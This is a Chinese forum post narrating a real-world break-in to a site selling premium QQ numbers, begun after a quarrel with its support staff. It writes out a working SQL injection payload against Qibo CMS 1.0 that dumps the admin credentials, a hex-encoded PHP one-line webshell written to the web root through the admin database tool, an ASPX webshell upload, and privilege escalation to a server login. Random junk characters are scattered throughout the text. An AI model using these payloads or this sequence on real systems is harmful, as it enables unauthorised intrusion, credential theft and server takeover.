|
. [$ m* ?8 Q6 J; ? W
( \/ }1 X! y9 F
( A/ z6 S* R& k' B8 r6 O' n$ P$ G
0 }! e& ] {: D' m; ? 一、踩点寻找漏洞
9 i. q }9 Y1 i* X- d- I
闲来无事,在各个QQ靓号群求买5位QQ,寻问半天无果就在百度搜索5位QQ扫号找到“目标”www.qq.com,打开一看就一静态页面,哇好多靓号啊,90000000,300000,98888888,199999999,哇这么多靓号,然后我去联系客服,要求客服登录账户看看,此处略去100字,然后开始撕逼,然后就有了下文。。。。
! \3 t+ r( G9 b% U! s
随手拿御剑扫了一下好多php页面,随手加一个member发现是齐博1.0的内容管理系统,然后就去百度找漏洞,什么后门漏洞一一做测试都无果,找来找去找到一个全版本的注入漏洞,详细利用方法如下:
' b$ _& z3 }* \1 C1 e
先注册一个用户,记住注册时候的邮箱以uid号,
7 ]# [! s+ ^& O7 {! ?- ^
! S1 z( i0 `" u4 N7 i3 F/ s; w
; r* P- _) ?# U% e' h }
然后我们打开火狐浏览器简单构造一下,http://www.qq.com/member/userinfo.php?job=edit&step=2,发送数据包如下:
2 T8 N) ?2 K8 V
4 V3 _0 \* {+ w; g
truename=xxxx%0000&Limitword[000]=&email=123@qq.com&provinceid=,address=(select user()) where uid=3%23
) v" }1 @9 A% Z3 q' M" `6 H这里的email和uid一定要和注册的账号所吻合,然后访问,提示成功以后查看用户资料如图:
) ~/ r/ d9 K9 M% o* z
J. r2 p# X. M
确实存在注入漏洞,那么我们来注入一下管理账号密码,修改数据包如:truename=xxxx%0000&Limitword[000]=&email=123@qq.com&provinceid=,address=(select concat(username,0x2e,password) from qb_members limit 1) where uid=3%23
* R( u3 F: D8 g% F/ I( p
! U% F- a J6 m" Y: Y9 U c+ g
# c# E1 ?4 ?1 R/ @
解密进后台如图:
3 r0 S5 d; z, W( Y& {) \
/ Y. t4 F7 |# K% z: F/ L
, p2 w2 Q1 n2 m& C9 w& Q# o [' _, m
5 h& Z4 O) L2 |( r
二、后台getwebshell
' u+ S. T# h2 _
进了后台,以前齐博有个后台getwebshell漏洞,在系统功能- 单篇文章独立页面管理-增加页面添加个webshell,如图:
/ E! f" \! T z7 d2 b1 E4 v
0 j! ]- Q5 p) z& h
& c& T& x2 k! j
# q+ ?5 Q z( G8 r0 p. Z8 P! o
然后点确定,添加提示
( V6 f' _0 Y, p, [9 r* ]6 D" A1 E. [
; M9 }3 d0 k6 Z# O, o7 n0 B
% g$ r! Z4 ]0 c( s: S; x" Y
1 j* T( K. H* @( [; I由于是ii6.0的所以我们可以考虑一下解析漏洞,我们再来如图:
& g# b$ y7 Y$ c# u; O( i/ f
) v2 J# k+ w8 x6 F$ l5 ?
3 E9 r4 X }' X6 E" P% p改静态页面为help.php;.htm,然后我们发现访问help.php;.htm是404(写文章之前测试是可以成功写入的),欧巴,他么的我们再想想别的办法,抽了一支烟,我们继续,他这里不是有个服务器信息、数据库工具吗,之前我们测试当前用户名是root,那么我们完全可以考虑利用服务器信息、数据库工具来导入一句话,屌屌的妈妈的,我们来演示一下,先把一句话hex编码一下,<?php assert($_POST[sb]);?>编码以后是:0x3C3F7068702061737365727428245F504F53545B73625D293B3F3EDA网站目录是D:\wwwroot\qq.com\admin\,注意我们要把\改成/,否则不成功D:/wwwroot/qq.com/admin/,下面我们来导一下
3 s7 B) d P+ X) O7 x
如图:
/ Y/ C" F5 U/ h3 E+ Q- _+ v
`* V" M: W1 H: a
" P: m9 }' O1 S" ]: g' t5 h9 P
0 F7 v6 m8 a6 o8 x. {5 D之前已经测试过了用普通菜刀无法连接,测试用过狗菜刀也无法连接,用xiese打开
, Y. D) z: A: t5 [- P0 R) I# C
9 a, D" J. G' |. u
1 M% E' e) j( [" Y* T: Z8 P7 _
( D1 B# l0 u0 L" i
三、提权进服务器
: X* F k7 {+ [经测试xise下一句话只有在admin目录下有权限浏览,且不能执行命令,庆幸的是支持aspx,那么我们就上一个aspx大马,然后执行命令提示拒绝访问,哈哈在c:\windows\temp下上传cmd.exe然后执行systeminfo,发现打了400多补丁,如图:
" E( n; W2 d# M$ ^, \! s
p" A$ f, {! l# r
& ]$ \% |& }1 R' \8 L; j7 I
啧啧啧,这么多补丁,我都没去试试今年和2014年放出来的exp,而且是在咱们大00下载了一个变异pr,然后上传提权如图:
|9 y0 O ~5 d; F! A
& b( W, C- b- O; M
O i6 t( ?- i
然后登陆服务器如图:
9 V" [2 k# ^9 O# P8 s2 z
2 ~% J% g; C& T, h ( h; t$ l+ N+ N, ~% ~
3 b9 ~" ~# }4 w% l. y: e
" A& v4 q t( s! S& }2 K+ R6 Y0 y
( |% Q# H9 K2 O6 A, w9 z% i* E3 W
难怪普通刀连接不上,原来是有狗。
6 C& z) S! w7 N/ p% o
0 e- r( d; g) \- q% ^( P
* F( Y! b4 t) U1 {% c6 }' W
& U( ?; U' g, y1 X" n
; M; C0 ]: X" O6 L
% K" m, @5 W6 x" F, r& E/ h* O
/ \5 n' e( J: z) ~7 h8 U | 
发表于 2018-10-20 20:08:47
收藏
支持
反对